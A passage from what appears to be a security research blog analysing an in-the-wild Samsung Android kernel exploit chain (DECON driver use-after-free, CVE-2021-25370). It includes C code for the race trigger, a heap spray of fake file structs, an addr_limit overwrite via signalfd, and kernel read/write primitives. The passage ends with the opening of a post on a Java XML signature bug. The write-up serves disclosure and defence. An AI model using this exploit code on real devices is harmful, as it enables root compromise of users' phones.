Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path.
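The fd-table walk might look like the following sketch (assuming pid holds the composer HAL's PID recovered from the log):

#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

// Walk /proc/<pid>/fd/, readlink() each entry, and return the backing path
// of the fd whose target contains "graphics/fb0" (the DECON device).
int find_decon_path(pid_t pid, char *out, size_t outlen) {
    char dirpath[64], linkpath[128];
    snprintf(dirpath, sizeof(dirpath), "/proc/%d/fd", pid);
    DIR *dir = opendir(dirpath);
    if (!dir)
        return -1;
    struct dirent *de;
    while ((de = readdir(dir)) != NULL) {
        snprintf(linkpath, sizeof(linkpath), "%s/%s", dirpath, de->d_name);
        ssize_t n = readlink(linkpath, out, outlen - 1);
        if (n < 0)
            continue;
        out[n] = '\0';
        if (strstr(out, "graphics/fb0")) {
            closedir(dir);
            return 0;
        }
    }
    closedir(dir);
    return -1;
}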

Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.

/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif

        wait_queue_head_t       wq;

        unsigned long           flags;

        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};

The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.

static int decon_set_win_config(struct decon_device *decon,
                struct decon_win_config_data *win_data)
{
        int num_of_window = 0;
        struct decon_reg_data *regs;
        struct sync_file *sync_file;
        int i, j, ret = 0;
[...]
        num_of_window = decon_get_active_win_count(decon, win_data);
        if (num_of_window) {
                win_data->retire_fence = decon_create_fence(decon, &sync_file);
                if (win_data->retire_fence < 0)
                        goto err_prepare;
        } else {
[...]
        if (num_of_window) {
                fd_install(win_data->retire_fence, sync_file->file);
                decon_create_release_fences(decon, win_data, sync_file);
#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)
                regs->retire_fence = dma_fence_get(sync_file->fence);
#endif
        }
[...]
        return ret;
}

In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.

int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)
{
        struct dma_fence *fence;
        int fd = -EMFILE;

        fence = kzalloc(sizeof(*fence), GFP_KERNEL);
        if (!fence)
                return -ENOMEM;

        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,
                   decon->fence.context,
                   atomic_inc_return(&decon->fence.timeline));

        *sync_file = sync_file_create(fence);
        dma_fence_put(fence);
        if (!(*sync_file)) {
                decon_err("%s: failed to create sync file\n", __func__);
                return -ENOMEM;
        }

        fd = decon_get_valid_fd();
        if (fd < 0) {
                decon_err("%s: failed to get unused fd\n", __func__);
                fput((*sync_file)->file);
        }

        return fd;
}

The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 

void decon_create_release_fences(struct decon_device *decon,
                struct decon_win_config_data *win_data,
                struct sync_file *sync_file)
{
        int i = 0;

        for (i = 0; i < decon->dt.max_win; i++) {
                int state = win_data->config[i].state;
                int rel_fence = -1;

                if (state == DECON_WIN_STATE_BUFFER) {
                        rel_fence = decon_get_valid_fd();
                        if (rel_fence < 0) {
                                decon_err("%s: failed to get unused fd\n",
                                                __func__);
                                goto err;
                        }

                        fd_install(rel_fence, get_file(sync_file->file));
                }

                win_data->config[i].rel_fence = rel_fence;
        }
        return;
err:
        while (i-- > 0) {
                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {
                        put_unused_fd(win_data->config[i].rel_fence);
                        win_data->config[i].rel_fence = -1;
                }
        }
        return;
}

decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.

When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.
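
The window between fd_install and the later use of sync_file->file inside the ioctl is what userspace has to hit. The sketch below shows one plausible way to do that; it is my reconstruction rather than the exploit's code, and the ioctl request code is a placeholder. It leans on the fact that decon_get_valid_fd hands out the lowest free descriptor, so the fence fd number is predictable:

/* Sketch of the race: one thread issues the win-config ioctl while a
 * second thread spins close()-ing the fd that the driver is about to
 * install. If the closer wins, decon_create_release_fences() and the
 * dma_fence_get() below it operate on a freed file struct. */
#include <pthread.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define WIN_CONFIG_REQ 0   /* placeholder for the real win-config ioctl code */

static int decon_fd;       /* fd for the DECON driver (via vulnerability #1) */
static int predicted_fd;   /* fd number decon_get_valid_fd() will return */

static void *closer(void *arg) {
    /* close() fails with EBADF until fd_install() publishes the fence fd,
     * then it drops the file's only reference. */
    while (close(predicted_fd) != 0)
        ;
    return NULL;
}

void trigger_uaf(void *win_config_data) {
    pthread_t t;
    predicted_fd = dup(0);  /* learn the next free fd number... */
    close(predicted_fd);    /* ...and free it again             */
    pthread_create(&t, NULL, closer, NULL);
    ioctl(decon_fd, WIN_CONFIG_REQ, win_config_data);
    pthread_join(t, NULL);  /* retire_fence/rel_fence now reference freed memory */
}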

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.

        if (num_of_window) {
-               fd_install(win_data->retire_fence, sync_file->file);
                decon_create_release_fences(decon, win_data, sync_file);
#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)
                regs->retire_fence = dma_fence_get(sync_file->fence);
#endif
        }

        decon_hiber_block(decon);

        mutex_lock(&decon->up.lock);
        list_add_tail(&regs->list, &decon->up.list);
+       atomic_inc(&decon->up.remaining_frame);
        decon->update_regs_list_cnt++;
+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);
        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);

+       /*
+        * The code is moved here because the DPU driver may get a wrong fd
+        * through the released file pointer,
+        * if the user(HWC) closes the fd and releases the file pointer.
+        *
+        * Since the user land can use fd from this point/time,
+        * it can be guaranteed to use an unreleased file pointer
+        * when creating a rel_fence in decon_create_release_fences(...)
+        */
+       if (num_of_window)
+               fd_install(win_data->retire_fence, sync_file->file);

        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:

fake_file.f_u = 0x1010101;
fake_file.f_op = kaddr - 0x2071B0 + 0x1094E80;
fake_file.f_count = 0x7F;
fake_file.private_data = addr_limit_ptr;

The f_op member is set to the signalfd_fops for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address, also leaked using vulnerability #2.

The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.

/**
 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
 * @buffer: Pointer to the information
 * @len: Length
 * @padding: Padding
 *
 * The data provided is accessible through a debugfs file
 */
struct kbase_ioctl_mem_profile_add {
        __u64 buffer;
        __u32 len;
        __u32 padding;
};

#define KBASE_IOCTL_MEM_PROFILE_ADD \
        _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)

static int kbase_api_mem_profile_add(struct kbase_context *kctx,
                struct kbase_ioctl_mem_profile_add *data)
{
        char *buf;
        int err;

        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {
                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");
                return -EINVAL;
        }

        buf = kmalloc(data->len, GFP_KERNEL);
        if (ZERO_OR_NULL_PTR(buf))
                return -ENOMEM;

        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),
                        data->len);
        if (err) {
                kfree(buf);
                return -EFAULT;
        }

        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);
}

This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.

Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. When Android introduces a new requirement like this, it only applies to devices that launch on that version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020, so it makes sense that the exploit targeted devices running Android 10 and earlier, where DebugFS would have been mounted.

Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs. The highlighted text reads: "Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices"

For example, on the A51 Exynos device (SM-A515F), which launched on Android 10, CONFIG_DEBUG_FS is enabled and DebugFS is mounted.

a51:/ $ getprop ro.build.fingerprint
samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys
a51:/ $ getprop ro.build.version.security_patch
2021-02-01
a51:/ $ uname -a
Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64
a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS
CONFIG_DEBUG_FS=y
a51:/ $ cat /proc/mounts | grep debug
/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0

Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.

#ifdef CONFIG_DEBUG_FS
int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,
                                        size_t size)
{
        int err = 0;

        mutex_lock(&kctx->mem_profile_lock);

        dev_dbg(kctx->kbdev->dev, "initialised: %d",
                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {
                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {
                        err  = -ENOMEM;
                } else if (!debugfs_create_file("mem_profile", 0444,
                                        kctx->kctx_dentry, kctx,
                                        &kbasep_mem_profile_debugfs_fops)) {
                        err = -EAGAIN;
                } else {
                        kbase_ctx_flag_set(kctx,
                                           KCTX_MEM_PROFILE_INITIALIZED);
                }
        }

        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {
                kfree(kctx->mem_profile_data);
                kctx->mem_profile_data = data;
                kctx->mem_profile_size = size;
        } else {
                kfree(data);
        }

        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",
                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        mutex_unlock(&kctx->mem_profile_lock);

        return err;
}
#else /* CONFIG_DEBUG_FS */
int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,
                                        size_t size)
{
        kfree(data);
        return 0;
}
#endif /* CONFIG_DEBUG_FS */

By writing the fake file structs as a single 0x2000-byte buffer rather than as 25 individual 0x140-byte buffers, the exploit writes its fake structs across two whole pages, which increases the odds of reallocating over the freed file struct.
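
As a concrete picture of this step, here is a sketch of the groom and spray. This is my reconstruction for illustration: the member offsets inside the fake file struct are assumptions (the real struct file layout differs per kernel build), and the simple memfd_create loop stands in for whatever churn the exploit actually performs. KBASE_IOCTL_TYPE is 0x80 in the Mali driver headers:

/* Sketch of the groom + spray (offsets inside the fake file are assumed). */
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define FILE_STRUCT_SIZE 0x140   /* sizeof(struct file) on this kernel  */
#define SPRAY_SIZE       0x2000  /* two pages: 25 fake structs fit      */

struct kbase_ioctl_mem_profile_add {
    uint64_t buffer;
    uint32_t len;
    uint32_t padding;
};
#define KBASE_IOCTL_MEM_PROFILE_ADD \
    _IOW(0x80, 27, struct kbase_ioctl_mem_profile_add)

void groom_and_spray(int mali_fd, uint64_t signalfd_fops_addr,
                     uint64_t addr_limit_ptr) {
    /* Step 1: churn the file slab by opening and closing 30,000+ files. */
    for (int i = 0; i < 30000; i++)
        close(memfd_create("groom", 0));

    /* Step 2: fill two pages with back-to-back fake file structs. */
    uint8_t spray[SPRAY_SIZE] = {0};
    uint64_t f_u = 0x1010101, f_count = 0x7F;
    for (size_t off = 0; off + FILE_STRUCT_SIZE <= SPRAY_SIZE;
         off += FILE_STRUCT_SIZE) {
        uint8_t *f = spray + off;
        memcpy(f + 0x00, &f_u, 8);                 /* file.f_u                      */
        memcpy(f + 0x28, &signalfd_fops_addr, 8);  /* file.f_op (offset assumed)    */
        memcpy(f + 0x38, &f_count, 8);             /* file.f_count (offset assumed) */
        memcpy(f + 0xC8, &addr_limit_ptr, 8);      /* private_data (offset assumed) */
    }

    /* Step 3: land the buffer in the kernel heap via MEM_PROFILE_ADD. */
    struct kbase_ioctl_mem_profile_add arg = {
        .buffer = (uint64_t)(uintptr_t)spray, .len = SPRAY_SIZE, .padding = 0,
    };
    ioctl(mali_fd, KBASE_IOCTL_MEM_PROFILE_ADD, &arg);
}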

The exploit then calls dup2 on the dangling fds. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that it successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of the fake file structures, f_count was set to 0x7F, so if any of them is incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.

To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
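
Concretely, the check could look like the sketch below; the helper name is mine, and the byte scan follows the description above:

/* Sketch of the refcount check: bump f_count via dup2, then look for the
 * 0x80 byte in the sprayed data exposed through debugfs. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int check_respray(int dangling_fd) {
    int d = dup2(dangling_fd, 999);   /* increments f_count: 0x7F -> 0x80 */
    (void)d;  /* keep the dup'd fd open so the refcount stays bumped */

    DIR *dir = opendir("/sys/kernel/debug/mali/mem");
    if (!dir) return 0;
    struct dirent *ent;
    char path[512], buf[0x2000];
    int hit = 0;
    while (!hit && (ent = readdir(dir)) != NULL) {
        if (ent->d_name[0] == '.') continue;
        snprintf(path, sizeof(path),
                 "/sys/kernel/debug/mali/mem/%s/mem_profile", ent->d_name);
        FILE *fp = fopen(path, "r");
        if (!fp) continue;
        size_t n = fread(buf, 1, sizeof(buf), fp);
        fclose(fp);
        if (memchr(buf, 0x80, n))     /* f_count was incremented in our spray */
            hit = 1;
    }
    closedir(dir);
    return hit;
}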

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  

Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.

signalfd(dangling_fd, 0xFFFFFF8000000000, 8);

According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).

int signalfd(int fd, const sigset_t *mask, int flags);

The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the sigmask of the signalfd_ctx struct.

typedef unsigned long sigset_t;

struct signalfd_ctx {
        sigset_t sigmask;
};

The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8-byte structure that contains the mask.

Let’s walk through how the signalfd source code updates the mask:

SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,
                size_t, sizemask, int, flags)
{
        sigset_t sigmask;
        struct signalfd_ctx *ctx;

        /* Check the SFD_* constants for consistency.  */
        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);
        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
                return -EINVAL;

        if (sizemask != sizeof(sigset_t) ||
            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))
               return -EINVAL;
        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));
        signotset(&sigmask);                                      // [1]

        if (ufd == -1) {                                          // [2]
                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);
                if (!ctx)
                        return -ENOMEM;

                ctx->sigmask = sigmask;

                /*
                 * When we call this, the initialization must be complete, since
                 * anon_inode_getfd() will install the fd.
                 */
                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
                if (ufd < 0)
                        kfree(ctx);
        } else {                                                 // [3]
                struct fd f = fdget(ufd);
                if (!f.file)
                        return -EBADF;
                ctx = f.file->private_data;                      // [4]
                if (f.file->f_op != &signalfd_fops) {            // [5]
                        fdput(f);
                        return -EINVAL;
                }
                spin_lock_irq(&current->sighand->siglock);
                ctx->sigmask = sigmask;                         // [6] WRITE!
                spin_unlock_irq(&current->sighand->siglock);

                wake_up(&current->sighand->signalfd_wqh);
                fdput(f);
        }

        return ufd;
}

First the function modifies the mask that was passed in. The mask passed into the function is the set of signals that should be accepted via the file descriptor, but the sigmask member of the signalfd_ctx struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] make this conversion. The call to sigdelsetmask ensures that SIGKILL and SIGSTOP are always blocked: it clears bit 8 (SIGKILL) and bit 18 (SIGSTOP) so that they end up set after the negation. signotset then flips each bit in the mask. The mask that is written is therefore ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).

The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer.

The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_fops. This is why the f_op was set to signalfd_fops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.

The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. The value that gets written is ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFBFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit with USER_DS rather than KERNEL_DS in the next section.
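
To sanity-check that arithmetic, here is a small standalone computation of the written value:

/* Standalone check of the sigmask arithmetic described above. */
#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t mask_arg = 0xFFFFFF8000000000ULL;
    /* sigdelsetmask clears bit 8 (SIGKILL) and bit 18 (SIGSTOP)... */
    uint64_t after_del = mask_arg & ~((1ULL << 8) | (1ULL << 18));
    /* ...and signotset flips every bit. */
    uint64_t written = ~after_del;
    printf("0x%llx\n", (unsigned long long)written);  /* prints 0x7fffffffff */
    return 0;
}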

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both are hardware mitigations: PAN was introduced in ARMv8.1 and UAO in ARMv8.2. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.

It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.

void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
  errno = 0;
  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
}

This technique works by first writing the contents that you’d like written into one end of the pipe. By then calling read with the kernel address you’d like to write to as the destination, those contents are written to that kernel memory address.

With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.

Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.

The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and disabled when it is not.

/* Restore the UAO state depending on next's addr_limit */
void uao_thread_switch(struct task_struct *next)
{
        if (IS_ENABLED(CONFIG_ARM64_UAO)) {
                if (task_thread_info(next)->addr_limit == KERNEL_DS)
                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));
                else
                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));
        }
}

The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:

void kernel_write(void *kaddr, const void *buf, unsigned long buf_len)
{
  unsigned long USER_DS = 0x7FFFFFFFFF;
  write(kernel_rw_pipe2, buf, buf_len);                   // [1]
  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]
  set_addr_limit_to_KERNEL_DS();                          // [3]
  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]
  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]
}

The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer contents to the pipe. The USER_DS value is written to the pipe at [2].

The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.

Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.
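
The sample's read function isn't shown in this post, but based on the description a plausible mirror image, reusing the same pipes and helpers as the kernel_write above, would look something like this (my reconstruction, not code from the sample):

/* Plausible mirror image of kernel_write: copy kernel memory out
 * through the pipe. */
extern int kernel_rw_pipe, kernel_rw_pipe2;
extern unsigned long *addr_limit_ptr;
extern void set_addr_limit_to_KERNEL_DS(void);

void kernel_read(void *kaddr, void *buf, unsigned long buf_len)
{
  unsigned long USER_DS = 0x7FFFFFFFFF;
  write(kernel_rw_pipe2, &USER_DS, 8u);      // queue the restore value while userspace is still accessible
  set_addr_limit_to_KERNEL_DS();
  write(kernel_rw_pipe2, kaddr, buf_len);    // with KERNEL_DS, write() may read from the kernel address
  read(kernel_rw_pipe, addr_limit_ptr, 8u);  // restore addr_limit to USER_DS while we can still write to it
  read(kernel_rw_pipe, buf, buf_len);        // back under USER_DS: drain the kernel bytes into the userspace buffer
}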

I am deliberately not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon”, which is responsible for mounting and unmounting external storage. vold runs as root, and while it’s a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s such a highly privileged security context, it makes a prime target for the exploit to change its SELinux context to.

Screenshot of the "OS Kernel" section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says: Functionality that: - is part of the kernel - runs in the same CPU context as the kernel (for example, device drivers) - has direct access to kernel memory (for example, hardware components on the device) - has the capability to load scripts into a kernel component (for example, eBPF) - is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).

As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of a different attack surface and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety issues. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 were not memory corruption vulnerabilities.

The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain: it was used 4 different times and at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. Java components in Android devices don’t tend to be the most popular targets for security researchers despite running at such a privileged level. This highlights an area for further research.

Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users: to do patch analysis and variant analysis, and to gain an understanding of what attackers already know.

The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.

This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.

Gregor Samsa: Exploiting Java's XML Signature Verification

2 November 2022 at 11:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022.


While the vulnerability discussed in this post has been patched, vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction


XML Signatures are a typical example of a security protocol invented in the early 2000’s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break their security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth based OpenID Connect (OIDC) is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations.


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


